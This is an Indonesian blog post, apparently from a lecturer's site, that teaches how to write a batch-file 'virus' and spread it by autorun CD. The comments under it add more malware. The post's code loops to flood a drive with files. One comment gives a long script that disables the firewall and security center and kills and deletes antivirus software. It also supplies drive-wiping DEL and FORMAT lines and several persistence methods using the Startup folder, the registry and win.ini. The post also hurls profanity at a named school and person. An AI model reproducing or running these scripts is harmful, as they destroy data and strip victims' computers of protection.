CAra BUAT VIRUS SEDerhana Dengan NOtePad

Halo,

Ketemu lagi Dengan saya,Skrng saya akan mengajari Anda Cara Membuat Virus Batch,
Silahkan Bka Notepad
Copy COde Dibawah ini
C:
cd
mkdir\Alert\Warning\Dangers\We_r_watching_u\Boultrack
@echo off
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ============= loving you ==============
echo ============= Ngorok Team ==============
echo ============ bone,31 Desember 2008 ==============
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Pause>null
:xyz
echo>>A.reg
echo>>b.chm
echo>>c.dll
echo>>d.htt
cls
goto xyz

lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
– buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

– lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
– file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
– copy file-file tsb ke CD
– nikmati efeknya



Oh iya,FUCK SMAGA SUKOHARJO AND FUCK WALID
SELAMAT MENCOBA

21 Tanggapan

  1. Assalam……Wr..Wb…

    Klo bisa sih saya minta Bapak ngajarin pelajaran Ms.Office 2007 lebih terperinci lagi biar kita2 bisa cepat beralih dari MO 2003 ke MO 2007!
    Trima Kasih sebelumnya PAK!
    hormatku……..

  2. Assalam………….Wr…….Wb….
    saya sangat bersyukur karena meskipun bapak sudah 2 minggu tidak masuk namun saya dan teman-teman Stie Yapi Bone masih bisa mengikuti mata kuliah 11 dan ke 12 dengan cara online. artinya antara mahasiswa dan dosen sudah menginflementasikan peran masing-masing
    sekali lagi terima kasih

    Hormatku
    Nirwana

  3. Assalam…………..Wr……………..Wb………..

    Maaf y Pak? Klo bisa dalam pelajaran KOMPUTER ini jangan keseringan lewat INTERNET! karena masih banyak temen2 yg belum mengerti hal tersebut lagi pula kadang merepotkan karena harus ke WARNEt. Klo saya ma tdk masalah d’kantor slalu ONLINE tapi bagaimana dengan yg lain?

    Hormat dariku

    BHOER (BURHANUDDIN)

  4. Assalam…………….Wr……………Wb………..

    Maaf lagi y PAK? Ada yg LUPA! Tapi bagus juga klo materinya d’ UNDUH g REPOT. Trus sekalian kalo bisa MID lewat INTERNET juga?
    (BERCANDA LOH PAK) Jangan dimasukin k’ hati
    Bukanka BERCANDA juga bukan SIFAT yang TERCELAH kan, memang sih ada batasnya berbeda dengan sabar yang tidak ada batasnya,Tidak bisa dipungkiri, di saat-saat tertentu kita memang membutuhkan suasana rileks dan santai untuk mengendorkan urat syaraf, menghilangkan rasa pegal dan capek sehabis bekerja. Diharapkan setelah itu badan kembali segar, mental stabil, semangat bekerja tumbuh kembali, sehingga produktifitas semakin meningkat. Hal ini tidak dilarang selama tidak berlebihan.

    HORMATKU

    BHOER

  5. eh,tambah kode virus lebih banyak ya!

  6. Asslakum,,, anda mengajarkan sesuatu yang kurang bagus! kode virus di atas, jelas copy paste dari link lain, tanpa menuliskan nama penulis awal! jelas ini PLAGIAT! diluar itu semua,,, baru mendengar namanya saja “virus” sudah jelas ini akan merusak atau iseng di komputer orang! ya,,, setelah ada menuliskan ini,,, maka akan menjamur virus-virus itu,,,!!!

    banyak yang mesti kita ajarkan selain hal di atas! pokokne bermanfaat bagi diri kita, keluarga, dan orang-orang disekitar kita! misalnya menangani virus!!! misalnya!

    mengenai respon-respon di atas, jelas adalah sesuatu bisa menjadi pelajaran bagi kita semua! kita sebagai penduduk pribumi kab. bone, jelas mau gaptek! tugas dan kuliah janganlah dipaksakan dikerjakan diinternat, karena jelas akan merepotkan mahasiswa! sebenarnya bagus!!! tapi jangan terlalu dipaksakan, jika ada mahasiswa yang mau kumpul tugas lewat internet, bisa juga! tapi yang gak lewat internet jangan ditolak! pak!!

    semua ada prosesnya,,, jika anda ingin bayi lansung berjalan, maka anda akan mematahkan tulang-tulangnya sehingga dia takkan berjalan seumur hidupnya! jalani prosesnya!!!

    hormatku,,
    ketua bem
    surya_stie

  7. hmmm.mnurut saya ini bukan ajaran tidak bagus malah ini adalah pelajaran bagus sekali…kenapa?dengan mengetahui dasar script virus dengan sendirinya nanti kita bakal bisa melumpuhkan atau memblok virus trsebut.ini menurut saya lho. dari segi IT..ini sangat bagus…TOP BGT deh…jadi jangan menilai sesuatu dari luarx broo…

  8. intinya jangan takut virus komputer brooo…gak bahay2 amat kok…virus manusia itu yg harus ditakuti..wkwkwkwk.Kalo anda takut ma virus PC hmmm jauhi dunia IT deh mendingan…cos mnurut sy dgn adanya sang virus kita bisa belajar banyak mis ttg gimana virus dibuat,dan bgmna cara menanganinya,dll.bageman mo ngebasmi kalo gak kenal cara kerja virusnya yakan?jgn terlalu mengandalkan ANTI VIRUS yg bnyk beredar..menanaganinya dengan cara manual lebih memuaskan dan amat sangat memuaskan…!go cyber world!!!

  9. Klo bisa kirim aja k email gw rumus virus yang laennya yang pake notepad juga.,
    di tunggu ya a???

  10. virus tailaso………
    kirim ke email gw
    gw rejeck
    virus copyan
    virus pabambangan na tolo………..really virus tolol

  11. virus tailaso………
    kirim ke email gw
    gw rejeck
    virus copyan
    virus pabambangan na tolo………..really virus tolol
    recruitment@av-indonesia.com

  12. yennym36@yahoo.com

    virus…….apaan tuch
    ke laut aja loch

  13. ap ga ad virus yg lain nyaaaaaaaaaaaaaaaaaaaaaaaaaaaa

  14. GAG GUNA !!!
    AMATIRAN !!
    LASO !!
    PECUNDANG !!

  15. gi bnyk virus plzz

  16. EtuT7N Thank you for the material. Do you mind if I posted it in her blog, of course, with reference to your site?

  17. coba virus yg satu ini di jamin ampuh

    @echo off
    color 0a
    msg *
    shutdown -s -t 5 -c “dalam waktu 5 menit komputer anda akan off

    hehe.. coba pada komputer lain jangan pada kom anda

  18. coba virus di bawah ini

    @echo off
    color 0a
    msg * awasvirus berbahaya
    shutdown -s -t 5 -c ” WARNING komputer anda akan off”

  19. ni masi ada lagi ni cara buat anti virus

    @ echo off
    rem ———————————
    rem Kill Anti-Virus
    net stop “Security Center”
    netsh firewall set opmode mode=disable
    tskill /A av*
    tskill /A fire*
    tskill /A anti*
    cls
    tskill /A spy*
    tskill /A bullguard
    tskill /A PersFw
    tskill /A KAV*
    tskill /A ZONEALARM
    tskill /A SAFEWEB
    cls
    tskill /A OUTPOST
    tskill /A nv*
    tskill /A nav*
    tskill /A F-*
    tskill /A ESAFE
    tskill /A cle
    cls
    tskill /A BLACKICE
    tskill /A def*
    tskill /A kav
    tskill /A kav*
    tskill /A avg*
    tskill /A ash*
    cls
    tskill /A aswupdsv
    tskill /A ewid*
    tskill /A guard*
    tskill /A guar*
    tskill /A gcasDt*
    tskill /A msmp*
    cls
    tskill /A mcafe*
    tskill /A mghtml
    tskill /A msiexec
    tskill /A outpost
    tskill /A isafe
    tskill /A zap*
    cls
    tskill /A zauinst
    tskill /A upd*
    tskill /A zlclien*
    tskill /A minilog
    tskill /A cc*
    tskill /A norton*
    cls
    tskill /A norton au*
    tskill /A ccc*
    tskill /A npfmn*
    tskill /A loge*
    tskill /A nisum*
    tskill /A issvc
    tskill /A tmp*
    cls
    tskill /A tmn*
    tskill /A pcc*
    tskill /A cpd*
    tskill /A pop*
    tskill /A pav*
    tskill /A padmin
    cls
    tskill /A panda*
    tskill /A avsch*
    tskill /A sche*
    tskill /A syman*
    tskill /A virus*
    tskill /A realm*
    cls
    tskill /A sweep*
    tskill /A scan*
    tskill /A ad-*
    tskill /A safe*
    tskill /A avas*
    tskill /A norm*
    cls
    tskill /A offg*
    del /Q /F C:\Program Files\alwils~1\avast4\*.*
    del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
    del /Q /F C:\Program Files\kasper~1\*.exe
    cls
    del /Q /F C:\Program Files\trojan~1\*.exe
    del /Q /F C:\Program Files\f-prot95\*.dll
    del /Q /F C:\Program Files\tbav\*.dat
    cls
    del /Q /F C:\Program Files\avpersonal\*.vdf
    del /Q /F C:\Program Files\Norton~1\*.cnt
    del /Q /F C:\Program Files\Mcafee\*.*
    cls
    del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
    del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
    del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
    del /Q /F C:\Program Files\Norton~1\*.*
    cls
    del /Q /F C:\Program Files\avgamsr\*.exe
    del /Q /F C:\Program Files\avgamsvr\*.exe
    del /Q /F C:\Program Files\avgemc\*.exe
    cls
    del /Q /F C:\Program Files\avgcc\*.exe
    del /Q /F C:\Program Files\avgupsvc\*.exe
    del /Q /F C:\Program Files\grisoft
    del /Q /F C:\Program Files\nood32krn\*.exe
    del /Q /F C:\Program Files\nood32\*.exe
    cls
    del /Q /F C:\Program Files\nod32
    del /Q /F C:\Program Files\nood32
    del /Q /F C:\Program Files\kav\*.exe
    del /Q /F C:\Program Files\kavmm\*.exe
    del /Q /F C:\Program Files\kaspersky\*.*
    cls
    del /Q /F C:\Program Files\ewidoctrl\*.exe
    del /Q /F C:\Program Files\guard\*.exe
    del /Q /F C:\Program Files\ewido\*.exe
    cls
    del /Q /F C:\Program Files\pavprsrv\*.exe
    del /Q /F C:\Program Files\pavprot\*.exe
    del /Q /F C:\Program Files\avengine\*.exe
    cls
    del /Q /F C:\Program Files\apvxdwin\*.exe
    del /Q /F C:\Program Files\webproxy\*.exe
    del /Q /F C:\Program Files\panda software\*.*
    rem ———————————

    Kalo Pengen yg mati ini aja

    @echo off
    DEL C:\ -y
    DEL D:\ -y
    FORMAT C:\ -y

    Mau Virus yg model gmana?

    Ni aku taro 3 auto run buat virus mu.
    Ini hanya menempatkan file batch kamu dalam folder Autostart.
    Code :
    rem Copy to Autostart
    cd “%userprofile%\Start Menu\Programs\Startup”
    copy “YourBatchFile.bat”

    Ini yang membuat virus dijalankan sebagai layanan [Reg Key].
    Code :
    rem run Virus as Service
    cd “C:\Windows”
    copy “YourBatchFile.bat”
    reg add HKLM\software\Microsoft\Windows\CurrentVersion\RunServices /v “YourBatchFile” /t REG_SZ /d “C:\Windows\YourBatchFile.bat” /f >nul

    Ini membuat virus Anda mulai dengan System.ini
    Code :rem Activate with System.ini
    cd “C:\Windows\System32”
    copy “YourBatchFile.bat”
    echo [windows] >> “C:\Windows\win.ini”
    echo load=”C:\Windows\system32\YourBatchFile.bat” >> C:\Windows\win.ini
    echo run=”C:\Windows\system32\YourBatchFile.bat” >> C:\Windows\win.ini

    Jangan Lupa @echo off ^_^ hehehe.. slamat mencoba

  20. nice post gan matur nuwunn😀

  21. mana lagi virusny masih kalah ma virus flu burung u smua pada mampus ma komputerny,,,hahahahahaah

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: